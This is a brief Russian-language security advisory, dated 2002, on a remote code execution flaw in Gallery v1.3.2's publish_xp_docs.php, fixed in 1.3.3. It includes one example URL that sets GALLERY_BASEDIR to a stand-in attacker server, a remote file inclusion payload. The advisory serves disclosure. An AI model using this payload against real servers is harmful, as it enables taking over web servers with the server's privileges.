Выполнение произвольных команд в Gallery

Дата публикации:
30.12.2002
Всего просмотров:
737
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Gallery – система управления изображениями от http://gallery.sourceforge.net.

Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера.

Пример:

http://hostname/gallery/publish_xp_docs.php?
GALLERY_BASEDIR=http://your.evil.server.tdl/
Уязвимость обнаружена в 1.3.2

Ссылки: Gallery v1.3.2 allows remote exploit (fixed in 1.3.3)
или введите имя

CAPTCHA